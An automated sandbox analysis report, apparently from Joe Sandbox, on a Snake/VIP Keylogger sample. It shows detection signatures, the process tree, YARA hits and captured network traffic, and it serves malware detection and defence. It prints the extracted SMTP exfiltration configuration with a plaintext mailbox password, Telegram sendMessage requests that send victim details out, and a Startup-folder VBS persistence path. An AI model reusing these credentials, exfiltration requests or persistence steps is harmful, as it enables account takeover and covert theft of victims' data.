
Windows Analysis Report
ty1nyFUMlo.exe

Overview

General Information

Sample name: ty1nyFUMlo.exe (renamed because the original name is a hash value)
Original sample name: e71789b9c70a2b9bbe541baf50d4e222be0d1b1cc2b38be925c01d9169158bf5.exe
Analysis ID: 1588893
MD5: a3d99bcf752d0b63fa8d5515a4765777
SHA1: cea1bb29d2d34f8c46fa6c9c645cc9753d5a918e
SHA256: e71789b9c70a2b9bbe541baf50d4e222be0d1b1cc2b38be925c01d9169158bf5
Tags: exe, SnakeKeylogger, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ty1nyFUMlo.exe (PID: 7388 cmdline: "C:\Users\user\Desktop\ty1nyFUMlo.exe" MD5: A3D99BCF752D0B63FA8D5515A4765777)
    • enterogenous.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\ty1nyFUMlo.exe" MD5: A3D99BCF752D0B63FA8D5515A4765777)
      • RegSvcs.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\ty1nyFUMlo.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 7708 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • enterogenous.exe (PID: 7760 cmdline: "C:\Users\user\AppData\Local\translucently\enterogenous.exe" MD5: A3D99BCF752D0B63FA8D5515A4765777)
      • RegSvcs.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\translucently\enterogenous.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | - | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2cf3a:$a1: get_encryptedPassword
  • 0x2d257:$a2: get_encryptedUsername
  • 0x2cd4a:$a3: get_timePasswordChanged
  • 0x2ce53:$a4: get_passwordField
  • 0x2cf50:$a5: set_encryptedPassword
  • 0x2e60a:$a7: get_logins
  • 0x2e56d:$a10: KeyLoggerEventArgs
  • 0x2e1d2:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.3795172591.0000000003378000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(31 further entries collapsed in the original report)

Source | Rule | Description | Author | Strings
6.2.enterogenous.exe.3b50000.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
6.2.enterogenous.exe.3b50000.1.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
6.2.enterogenous.exe.3b50000.1.raw.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
6.2.enterogenous.exe.3b50000.1.raw.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
6.2.enterogenous.exe.3b50000.1.raw.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2e13a:$a1: get_encryptedPassword
  • 0x2e457:$a2: get_encryptedUsername
  • 0x2df4a:$a3: get_timePasswordChanged
  • 0x2e053:$a4: get_passwordField
  • 0x2e150:$a5: set_encryptedPassword
  • 0x2f80a:$a7: get_logins
  • 0x2f76d:$a10: KeyLoggerEventArgs
  • 0x2f3d2:$a11: KeyLoggerEventArgsEventHandler
(27 further entries collapsed in the original report)

                  System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs", ProcessId: 7708, ProcessName: wscript.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 3.130.71.34, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7496, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49904
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs", CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs", ProcessId: 7708, ProcessName: wscript.exe

                  Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\AppData\Local\translucently\enterogenous.exe, ProcessId: 7460, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\enterogenous.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T06:49:12.512517+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49776 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:13.763692+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49788 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:15.017568+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49796 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:17.567928+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49815 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:18.840277+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49826 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:20.233159+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49839 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:21.526975+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49847 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:28.196656+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49893 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:33.261879+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49933 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:34.531438+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49943 | 104.21.32.1 | 443 | TCP
2025-01-11T06:49:37.046767+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.9 | 49963 | 104.21.32.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T06:49:11.042226+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49764 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:11.948460+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49764 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:13.198467+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49782 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:26.761020+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49883 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:27.651622+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49883 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:28.932879+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49898 | 193.122.6.168 | 80 | TCP
2025-01-11T06:49:30.167266+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.9 | 49906 | 193.122.6.168 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T06:49:22.457221+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.9 | 49853 | 149.154.167.220 | 443 | TCP
2025-01-11T06:49:37.930589+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.9 | 49969 | 149.154.167.220 | 443 | TCP


                  AV Detection

Source: ty1nyFUMlo.exe; Avira: detected
Source: http://mail.acadental.com; Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Avira: detection malicious, Label: HEUR/AGEN.1319493
Source: 00000003.00000002.3791163222.0000000000403000.00000040.80000000.00040000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}
Source: 6.2.enterogenous.exe.3b50000.1.raw.unpack; Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "shipping@acadental.com", "Password": "Dental9201$", "Host": "mail.acadental.com", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; ReversingLabs: Detection: 73%
Source: ty1nyFUMlo.exe; Virustotal: Detection: 61%
Source: ty1nyFUMlo.exe; ReversingLabs: Detection: 73%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Joe Sandbox ML: detected
Source: ty1nyFUMlo.exe; Joe Sandbox ML: detected

                  Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: ty1nyFUMlo.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49770 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.9:49888 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49853 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49969 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP; source: enterogenous.exe, 00000002.00000003.1405377070.0000000004420000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000002.00000003.1403392963.0000000004570000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1562636640.0000000004010000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1561654422.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: enterogenous.exe, 00000002.00000003.1405377070.0000000004420000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000002.00000003.1403392963.0000000004570000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1562636640.0000000004010000.00000004.00001000.00020000.00000000.sdmp, enterogenous.exe, 00000006.00000003.1561654422.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe; Code function: 0_2_0057DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0057DBBE
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe; Code function: 0_2_0054C2A2 FindFirstFileExW, 0_2_0054C2A2
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe; Code function: 0_2_005868EE FindFirstFileW,FindClose, 0_2_005868EE
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe; Code function: 0_2_0058698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_0058698F
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe; Code function: 0_2_0057D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0057D076
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe; Code function: 0_2_0057D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0057D3A9
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe; Code function: 0_2_00589642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00589642
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe; Code function: 0_2_0058979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0058979D
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe; Code function: 0_2_00589B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00589B2B
Source: C:\Users\user\Desktop\ty1nyFUMlo.exe; Code function: 0_2_00585C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00585C97
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Code function: 2_2_00A9DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 2_2_00A9DBBE
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Code function: 2_2_00A6C2A2 FindFirstFileExW, 2_2_00A6C2A2
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Code function: 2_2_00AA68EE FindFirstFileW,FindClose, 2_2_00AA68EE
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Code function: 2_2_00AA698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 2_2_00AA698F
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Code function: 2_2_00A9D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00A9D076
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Code function: 2_2_00A9D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00A9D3A9
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Code function: 2_2_00AA9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00AA9642
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Code function: 2_2_00AA979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00AA979D
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Code function: 2_2_00AA9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 2_2_00AA9B2B
Source: C:\Users\user\AppData\Local\translucently\enterogenous.exe; Code function: 2_2_00AA5C97 FindFirstFileW,FindNextFileW,FindClose, 2_2_00AA5C97
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 030DF45Dh 3_2_030DF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 030DF45Dh 3_2_030DF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 030DFC19h 3_2_030DF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 0192F45Dh 7_2_0192F2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 0192F45Dh 7_2_0192F4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 0192FC19h 7_2_0192F970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7E959h 7_2_06C7E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C731E0h 7_2_06C72DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C70D0Dh 7_2_06C70B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C71697h 7_2_06C70B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C72C19h 7_2_06C72968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7E0A9h 7_2_06C7DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7F209h 7_2_06C7EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7CF49h 7_2_06C7CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C731E0h 7_2_06C72DC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7D7F9h 7_2_06C7D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7E501h 7_2_06C7E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7F661h 7_2_06C7F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7EDB1h 7_2_06C7EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7D3A1h 7_2_06C7D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_06C70040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7FAB9h 7_2_06C7F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C7DC51h 7_2_06C7D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4x nop then jmp 06C731E0h 7_2_06C7310E

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49969 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49853 -> 149.154.167.220:443
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 6.2.enterogenous.exe.3b50000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.enterogenous.exe.4370000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.1408624551.0000000004370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1567496697.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficTCP traffic: 192.168.2.9:49904 -> 3.130.71.34:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:34:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:549163%0D%0ADate%20and%20Time:%2011/01/2025%20/%2011:35:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20549163%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49782 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49764 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49898 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49883 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49906 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49776 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49788 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49826 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49815 -> 104.21.32.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49796 -> 104.21.32.1:443
